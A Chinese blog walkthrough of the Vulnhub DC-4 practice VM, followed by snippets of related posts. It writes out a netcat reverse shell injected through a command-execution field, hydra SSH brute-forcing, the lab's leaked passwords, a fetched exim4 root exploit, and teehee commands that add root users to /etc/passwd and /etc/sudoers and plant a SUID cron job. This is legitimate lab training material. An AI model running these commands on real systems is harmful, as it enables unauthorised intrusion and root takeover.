DC靶场系列--DC-4

于 2025-01-13 21:40:37 发布
阅读量974 收藏 17
点赞数 10
CC 4.0 BY-SA版权
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_86817779/article/details/145124482

DC靶场系列--DC-4

目录

信息搜集

主机发现

image-20250113194725962

image-20250113194725962

端口扫描

image-20250113194751242

image-20250113194751242

dirb目录扫描和dirsearch扫描都没出来什么东西。

192.168.213.158登上去是一个网页

image-20250113194922945

image-20250113194922945

我们首先试一下弱密码爆破

漏洞利用

burp爆破--管理员密码

猜测用户名为admin,导入字典

image-20250113195215131

image-20250113195215131

爆破出来密码为happy,登陆成功

命令执行漏洞---反弹shell

登陆进去后有个command按钮,有三条可以运行的命令

image-20250113195414613

image-20250113195414613

猜测可以进行命令执行,那我们可以执行反弹shell,kali机开启监听

nc -lvvp 8888

修改radio内容

nc -c /bin/bash 192.168.213.154 8888
python3 -c 'import pty;pty.spawn("/bin/bash")'    [美化终端]    

image-20250113200042438

image-20250113200042438

成功反弹shell

hydra爆破---ssh连接

我们再次进行信息搜集。进入/home目录,发现三个用户,依次进入查看其文件内容,只有jim底下有一个old-passwords.bak文件,它里面都是密码

image-20250113200754383

image-20250113200754383

我们将这些密码粘贴到kali的password.txt文件,使用hydra对

jim用户进行SSH协议的密码破解尝试

 hydra -l jim -P /range/DC/DC-4/passwd.txt ssh://192.168.213.158

image-20250113201405656

image-20250113201405656

用户名:jim 密码: jibril04

image-20250113201546644

image-20250113201546644

连接成功

提权方法1---find提权

首先sudo -l 显示”Sorry, user jim may not run sudo on dc-4“.

那我们find查找一下具有SUID权限且属于root用户的文件

image-20250113202033902

image-20250113202033902

发现exim4,这个可以用来提权

首先查找exim4的版本信息

/usr/sbin/exim4 --version

image-20250113202458879

image-20250113202458879

把那本为4.89,那我们搜索一下相关的exp

image-20250113202633702

image-20250113202633702

首先利用一下46996.sh

 locate linux/local/46996.sh
 cat /usr/share/exploitdb/exploits/linux/local/46996.sh     

这个是脚本可以直接利用,我们将他传送到jim用户上

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 2.sh
python -m http.server 4446

靶机上

 wget http://192.168.213.154:4446/2.sh

image-20250113203217489

image-20250113203217489

运行显示权限不够,加个权限就可以

image-20250113203425211

image-20250113203425211

提权方法2---teehee

信息搜集---进入charles用户

image-20250113203719373

在这里有给jim写的信,我们可以查看一下该系统的邮箱目录看是否有可以搜集的信息

image-20250113204006531

image-20250113204006531

通过ai可得知在Linux系统中,邮件通常存储在/var/mail目录下。进入该目录

image-20250113204203117

image-20250113204203117

可以看出,charles给jim留下了自己的密码 ^xHhA&hvim0y,我们su一下,切换用户

sudo提权---teehee

image-20250113204407282

image-20250113204407282

image-20250113204426172

image-20250113204426172

通过查看得知,teehee -a是追加内容

那我们可以在/etc/passwd中追加一条自己定义的拥有root权限用户,然后登录,这样也就算是完成了提权

添加空密码的有root权限的用户

image-20250113205657548

image-20250113205657548

第二个密码域置空,第三个uid和第四个gid和root用户的保持一致

echo "shanran::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

image-20250113210530231

image-20250113210530231

添加有密码的有root权限的用户
perl -le 'print crypt("root", "sa")'
//该命令的作用是使用 crypt 函数对字符串 "root" 进行加密,使用盐值 "sa",并输出加密后的结果。
echo "hack:saFKJij3eLACw:0:0:::/bin/bash" |sudo teehee -a /etc/passwd

image-20250113210845932

image-20250113210845932

觉得这样获取flag有点问题的,可以charles用户 提升为具有root权限,即写入/etc/sudoers文件中提权

charles ALL=(ALL:ALL) ALL
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

sudo -l 发现用户确实有了root权限。直接使用 sudo su来提升为root权限,输入密码即可

提权方法3---定时任务提权

查看系统支持shell环境

cat /etc/shells

image-20250113211644461

image-20250113211644461

赋予/bin/sh文件SUID权限,用teehee命令把这个定时任务写到定时任务文件/etc/crontab

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
//* * * * *表示后面的命令每一分钟都执行;

cat /etc/crontab发现定时任务已被写入,那可以直接进入/bin/bash环境

image-20250113212010479

image-20250113212010479

提权完成

是山然呀
关注
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 498
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1605
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC-4靶场实战
qq_42754807的博客
03-30 1461
DC-4靶场实战
DC4靶场
m0_62438849的博客
03-09 1202
例如,网站可能是由静态文件组成,不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型,并可以以不同的方式自定义每种负载类型。Payload type(负载类型):较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”,指的是仅是这个用户无法使用bash或者其他shell来登录系统而已,并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin,此时无法登录系统,即时给了密码也不行。
靶场DC-4
好好学习
11-28 833
每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!针对DC系列靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。
DC-4靶机
mlws1900的博客
03-24 1703
下载不下来用迅雷下载。
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第一个练习环境。DC1靶场通常包含一系列的关卡,每一个关卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场通关详细...
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
DC系列靶场---DC 5靶场的渗透测试
zhouA0221的博客
08-06 1679
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php。
DC系列靶场---DC 1靶场的渗透测试(一)
zhouA0221的博客
07-17 1673
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
DC渗透系列DC-4靶场
xydsg的博客
02-05 799
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限。存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell。转换用户,发现一个teehee用户可以使用root无密码权限。teehee可以通过修改该文件达到添加用户的效果,文件格式为。linux的邮件目录是/var/spool/mail。抓个包,发现ls -l命令是radio参数后的值。把里面的密码取出来存着先 命名为jim.txt。backups里面有老密码,mbox不够权限。我们可以使用keehee添加root权限用户。
【Vulnhub靶场DC-4
good good study day day up
10-26 726
DC-4渗透测试过程,弱口令爆破,hydra密码爆破,teeheem命令提权
vulnhub靶场DC-4
kukudeshuo的博客
07-12 382
vulnhub靶场DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 724
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 3049
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub靶场渗透-DC-4
paidx0
10-21 302
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1237
vulnhub之dc-4详细步骤
DC_4 靶场夺旗
猎荒者
02-22 439
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) DC_4 虚拟机 NAT 网络连接 1. 主机发现 方法一:fping -asg 10.10.16.0/24 方法二:nmap -sP 10.10.16.0/24 2. 端口扫描 nmap -A -v -sS -sV -p- ...
DC-4靶场渗透】
一纸荒芜的博客
07-04 2350
DC-4渗透
DC-1靶场
最新发布
03-21
首先,用户提供的引用中有提到DC-1渗透靶场实战速通版,引用[4]提到了一些具体步骤,比如退出数据库、查看用户信息等。这可能意味着DC-1是一个用于渗透测试练习的靶机,常见于网络安全训练中。 接下来,我需要确认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值